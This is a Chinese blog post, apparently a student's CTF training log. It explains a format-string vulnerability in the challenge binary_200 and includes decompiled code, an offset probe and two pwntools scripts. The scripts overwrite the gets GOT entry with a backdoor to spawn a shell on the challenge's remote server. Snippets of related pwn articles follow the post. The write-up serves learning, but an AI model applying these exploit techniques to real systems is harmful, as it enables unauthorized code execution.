pwn暑假训练(九) emem原来昨天是8今天是9

最新推荐文章于 2023-05-31 09:57:58 发布
最新推荐文章于 2023-05-31 09:57:58 发布
阅读量287 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37433000/article/details/99329716
本文深入探讨了格式化字符串漏洞的危害与利用方法,通过实际案例binary_200,详细解析了如何利用该漏洞泄露内存地址,修改 GOT 表以调用后门函数获取 shell,展示了 pwntool 工具的使用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天学习了一手格式化字符串,这个漏洞危害真的大~~
可以改覆写地址上所指向的值还可以泄露地址上的值这个真的太强了我们直接泄露一个libc函数的真实地址然后匹配libc找到基址偏移没有防护就什么都成了…
归正题我做了whalectf的binary_200练手
我们得到程序发现有用的信息如下
32位有nx,Canary found
ida打开
有一个后门函数

int canary_protect_me()
{
  return system("/bin/sh");
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+14h] [ebp-2Ch]
  unsigned int v5; // [esp+3Ch] [ebp-4h]

  v5 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  gets(&s);
  printf(&s);
  gets(&s);
  return 0;
}

有溢出但有Canary如果你够强似乎可以去泄露Canary然后溢出但我这里就不用的因为阅读程序可知这个程序有格式化字符串漏洞printf(&s);
我们先猜测偏移

AAAA%p %p %p %p %p %p %p %p %p %p %p %p %P
AAAA(nil) 0x1 (nil) 0xf7f433fc 0x41414141 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 %P

这是我尝试的发现格式化字符串的偏移为5然后我们继续阅读程序
发现程序继续让我们输入调用了get()函数

.text:080485D3 call    _printf
.text:080485D8 ; 10:   gets(&s);
.text:080485D8 lea     eax, [esp+40h+s]
.text:080485DC mov     [esp], eax      ; s
.text:080485DF call    _gets
.text:080485E4 mov     eax, 0
.text:080485E9 mov     edx, [esp+3Ch]
.text:080485ED xor     edx, large gs:14h
.text:080485F4 jz      short locret_8

找到这个函数的got地址我们就可以利用这个函数将其got表地址对应的函数改成后门函数从而getshell
直接上我的exp:

from pwn import *
#p=process('../binary_200')
p=remote('bamboofox.cs.nctu.edu.tw',22002)
elf=ELF('../binary_200')
system_addr=0x0804854D
gets_got=elf.got['gets']
offset=5
payload=fmtstr_payload(offset,{gets_got:system_addr})
p.sendline(payload)
p.interactive()

emem这里还有大佬的exp我想记录一下pwntool的工具

from pwn import *


addr_gets = 0x804a010
addr_protect_me = 0x804854d
#这个方法我有点不懂但应该是pwntool自带的工具用来算出偏移 ??
def exec_fmt(payload):
	# p = remote("bamboofox.cs.nctu.edu.tw", 22002)
	p = process("./pwn200")
	p.sendline(payload)	
	return p.recv(4096)

autofmt = FmtStr(exec_fmt)
offset = autofmt.offset
# offset = 5
#这个后面的和我一样.....
payload = fmtstr_payload(offset, {addr_gets: addr_protect_me})
r = remote("bamboofox.cs.nctu.edu.tw", 22002)
r.sendline(payload)
r.interactive()

emempwn好难

pwn学习系列--任务4 pwn200
weixin_44113469的博客
02-11 947
栈溢出之pwn200解题步骤 主要涉及到Ret2libc–修改返回地址,让其指向内存中已有的某个函数,还涉及到简单的rop( Return Oriented Programming )构造 思路分析:有read函数,变量buf大小为0x68,read可写入0x100,可知有栈溢出。题目中只给出system函数,没有给出“/bin/sh”,所以要自己通过read函数写入“/bin/sh”,然后返回调...
171230 编程-井字棋(逆)的先手必胜策略
whklhhhh的博客
01-01 1万+
1625-5 王子昂 总结《2017年12月30日》 【连续第456天总结】 A. bambooctf-toddler-notakto-revenge B. ========== Welcome to the Notakto Game ========== Notakto is tic-tac-toe with both players playing the same piece
BUUCTF Pwn 1-12题解析及答案
红叶的博客
02-28 2979
这里使用fmtstr_payload直接替换 atoi_got 的原因是got表才是程序运行时函数的真正地址,通过替换atoi,修改为system,再送入'/bin/sh\x00' 即可成功getshell。s 的大小是0x3C,那么我们只需要输入 0x3C,也就是60 / 3 个I即可溢出,之后的内容我们可以就可以构建ROP链。也就是说,我们最多输入32个字节的东西,根据上文,我们可以输入32个I,这样就是32个you,也就是96个字节。0x0F + 0x08 代表 s 的大小加上8字节大小的rbp。
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 2461
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 5790
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 627
做题记录
电源技术中的电感是PWN DC/DC转换器中常用的元件
11-16
电感是PWN DC/DC转换器中常用的元件,由于它的电流、电压相位不同,因此理论上损耗为零。电感常被用做储能元件,也常与电容共同在输 人滤波器和输出滤波器上用于平滑电流,故也常称为扼流圈。其特点是流过其上的电流...
电源技术中的电容是PWN DC/DC转换器中常用的元件
11-16
在电源技术中,电容是PWN DC/DC转换器不可或缺的元件,它与电感共同承担能量存储和传输的任务,但对频率响应的特性截然相反。电容的主要作用在于吸收纹波,平滑输出电压,从而确保电源的稳定。然而,实际应用中的...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
【网络安全竞赛】XCTF联赛常考题目解析:涵盖Web、密码学、逆向、Pwn、MISC等方向的实战训练
最新发布
04-05
内容概要:本文汇总了30道XCTF联赛中常见的竞赛题目,涵盖了Web安全、密码学、逆向工程、Pwn(漏洞利用)以及MISC(杂项)等多个领域。每个题目不仅提供了详细的背景描述,还给出了具体的解题思路与参考答案。例如,...
whalectf 部分writeup
JD san的博客
05-01 3461
Web Find me 右键查看源码flag:{This_is_s0_simpl3} 密码泄露 http://39.107.92.230/web/web5/password.txt发现密码字典 爆破发现长度不一样的密码:Nsf0cuS 源码中截断了5位,修改请求包,将密码改为Nsf0cuS,返回这里没有flag字样 发现cookies:newpage=MjkwYmNhNzBjN2RhZ...
PWN栈溢出
u012173720的博客
11-21 611
Return2libc --修改返回地址,让其指向内存中已有的某个函数 根据上面副标题的说明,要完成的任务包括:在内存中确定某个函数的地址,并用其覆盖掉返回地址。由于 libc 动态链接库中的函数被广泛使用,所以有很大概率可以在内存中找到该动态库。同时由于该库包含了一些系统级的函数(例如 system() 等),所以通常使用这些系统级函数来获得当前进程的控制权。鉴于要执行的函数可能需要参数,比...
pwn学习-攻防世界新手区
qq_45653588的博客
12-20 1591
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
pwn200
weixin_44007796的博客
02-12 382
pwn200 wp 一.了解一下rop 攻击前提: 存在栈溢出且可以控制返回地址 存在满足条件的gadget,如果开启PLE保护则要想办法泄露gadget的地址 二.解题开始 1.先用gdb调试,查看保护机制 2.用IDA 分析,发现read函数存在栈溢出,0x68的buf硬生生写入了0x100 3,用pattern确定偏移量 先150来生成一段150个字节的字符串,r后输入它,再用pat...
HWS 2021 冬令营选拔赛 部分WP
lrcno6的编程世界
02-01 2967
比完后速度开肝WP 总分: 850 排名: 33 第一次这么长(shuang)时间肝比赛 3整天+1晚(理论上来说还有一早但我没用) 不得不说还是挺有意思的 目录: PWN2 ememarm PWN2 ememarm aarch64架构 上网搜到了环境配置: socat tcp-l:$port,fork exec:"$command",reuseaddr 譬如: socat tcp-l:10002,fork exec:"qemu-aarch64 -g 1234 ememarm",reusea
pwn学习-格式化字符串的利用
WocW的博客
03-08 2265
覆盖栈内存 所用例子 /* example/overflow/overflow.c */ #include <stdio.h> int a = 123, b = 456; int main() { int c = 789; char s[100]; printf("%p\n", &c); scanf("%s", s); printf(s); if...
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
pwn暑假训练() emem这次的测验自己还是太菜
doudoudedi
08-14 788
记一下昨天的测验我直接讲我没过的题目 有system函数没有’bin/sh’只开了nx但gadget少的可怜题目直接给了libc那就不用想了直接找偏移…我同学给的libc偏移不对… Gadgets information ============================================================ 0x00000000004006d2 : pop rbp...
pwn是什么文件
03-27
好的,我现在需要回答用户关于pwn文件的类型、用途和格式的问题。根据用户提供的引用资料,我需要先理解这些引用中的相关内容,然后结合自己的知识进行整理。 首先,用户提到了三个引用。引用[1]和[2]都涉及ELF文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值